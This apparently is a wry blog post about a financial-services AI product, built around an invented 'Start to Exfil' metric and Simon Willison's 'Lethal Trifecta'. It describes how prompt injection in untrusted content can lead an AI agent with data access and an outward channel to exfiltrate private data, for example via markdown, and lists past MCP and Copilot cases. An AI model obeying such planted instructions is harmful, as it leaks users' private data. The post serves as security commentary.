Anthropic just announced “Claude for Financial Services”, which sounds pretty amazing. It combines your financial data, AI, and MCPs.

Oh, wait…

The greatest FPS metric ever invented was STC — Start to Crate. It rated games on how long you waited before you found breakable crates (or barrels) full of loot. I think we’re about to see a new metric for Agentic AI products: Start to Exfil, or STE: How long a new AI MCP tool is online before a massive data vulnerability is discovered.

Start to Exfil

The core challenge here is that LLMs do not reliably distinguish instructions from data, so adding instructions into data works remarkably well. It’s like SQL injections on steroids. Simon Willison call this The Lethal Trifecta.

Access to your private data—one of the most common purposes of tools in the first place!

Exposure to untrusted content—any mechanism by which text (or images) controlled by a malicious attacker could become available to your LLM

The ability to externally communicate in a way that could be used to steal your data (I often call this “exfiltration” but I’m not confident that term is widely understood.)

Some recent examples:

• Atlassian’s MCP STE 49 Days
• GitHub MCP Integration: STE 52 Days
• GitLab Duo STE 1 year
• Microsoft Copilot: STE 2 years

Financial service MCPs?

So, back to Anthropic. They promise:

The Financial Analysis Solution unifies your financial data — from market feeds to internal data stored in platforms like Databricks and Snowflake — into a single interface. Access your critical data sources with direct hyperlinks to source materials for instant verification, all in one platform with expanded capacity for demanding financial workloads.

We know the Anthropic folks are super smart, but want to place bets until someone using this manages to accidentally ship their entire internal DB out via markdown? Imagine the pressure being applied to infra and security teams to sign off on these products.

Want to bet on STE?

Google has started framing solutions, because we all Gemini all up in our data but — uh — safe?

SMBC even made a great comic about it, but it was so popular embedding is disabled.